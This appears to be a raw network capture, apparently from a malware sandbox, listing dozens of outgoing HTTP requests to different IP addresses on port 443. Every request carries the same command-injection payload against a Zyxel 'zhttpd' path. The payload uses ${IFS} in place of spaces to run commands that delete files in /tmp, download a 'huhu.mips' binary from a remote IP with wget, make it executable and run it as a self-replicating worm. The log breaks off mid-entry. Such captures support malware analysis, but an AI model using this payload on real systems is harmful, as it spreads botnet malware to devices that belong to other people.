                                      Jan 19, 2024 17:29:22.575901031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2067192.168.2.1434084146.209.229.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.575917959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2068192.168.2.143437614.250.135.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.575975895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2069192.168.2.1445996207.81.104.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.576020956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2070192.168.2.1448274115.121.106.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.576071978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2071192.168.2.1454108121.221.229.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.576108932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2072192.168.2.1445734146.173.96.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.576157093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2073192.168.2.1451744108.140.52.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.576180935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2074192.168.2.144481020.12.142.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.576222897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2075192.168.2.1460084166.196.230.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.576272964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2076192.168.2.1454514128.235.39.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.576311111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2077192.168.2.143471266.209.66.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.576359987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2078192.168.2.143820472.198.174.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.576390982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2079192.168.2.1458470102.77.107.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.576442957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2080192.168.2.1440908219.113.114.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.576466084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2081192.168.2.1444718210.225.213.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.576527119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2082192.168.2.14471784.238.110.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.576561928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2083192.168.2.1455494106.39.72.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.576601028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2084192.168.2.1436468121.109.107.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.576639891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2085192.168.2.145045064.89.154.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.576685905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2086192.168.2.1434108145.14.159.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.576719046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2087192.168.2.1437254191.189.162.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.576747894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2088192.168.2.1459072176.206.26.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.576788902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2089192.168.2.143785892.95.114.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.576844931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2090192.168.2.143518643.147.248.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.576867104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2091192.168.2.143487058.112.247.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.576904058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2092192.168.2.1436398124.246.46.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.576960087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2093192.168.2.1436994222.234.159.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.576986074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2094192.168.2.1441442141.22.96.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.577029943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2095192.168.2.14556769.233.162.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.577065945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2096192.168.2.143599432.251.109.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.577107906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2097192.168.2.144382483.63.78.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.577152967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2098192.168.2.144947698.54.201.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.577188015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2099192.168.2.1444138161.157.222.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.577225924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2100192.168.2.1443652183.232.70.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.577265978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2101192.168.2.1454644144.88.107.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.577316046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2102192.168.2.144461654.185.105.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.577342987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2103192.168.2.1457628152.144.241.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.577394009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2104192.168.2.1436574147.169.218.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.577435017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2105192.168.2.1439828221.235.21.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.577446938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2106192.168.2.146090453.30.244.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.577512980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2107192.168.2.1433690145.132.61.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.577542067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2108192.168.2.144876253.124.99.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.577572107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2109192.168.2.1437726166.49.199.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.577615976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2110192.168.2.1458448107.96.245.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.577651024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2111192.168.2.1453956169.169.253.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.577692986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2112192.168.2.1445598103.171.183.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.577730894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2113192.168.2.143603444.100.225.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.577768087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2114192.168.2.145097434.109.139.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.577814102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2115192.168.2.144258652.186.137.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.577845097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2116192.168.2.1444000119.85.177.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.577900887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2117192.168.2.143889417.113.50.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.577941895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2118192.168.2.1445920180.208.94.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.577986002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2119192.168.2.1451078212.95.235.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.578012943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2120192.168.2.144847037.105.117.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.578083992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2121192.168.2.143808084.54.248.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.578118086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2122192.168.2.1443540161.208.98.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.578159094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2123192.168.2.1443062181.158.17.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.578192949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2124192.168.2.145097252.43.10.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.578241110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2125192.168.2.143630297.110.199.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.578273058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2126192.168.2.1442800156.235.234.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.578321934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2127192.168.2.1457680201.146.59.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.578376055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2128192.168.2.1447108219.116.172.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.578428030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2129192.168.2.146017012.77.22.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.578464031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2130192.168.2.1455202220.17.117.213443
                                      TimestampBytes transferredDirectionData
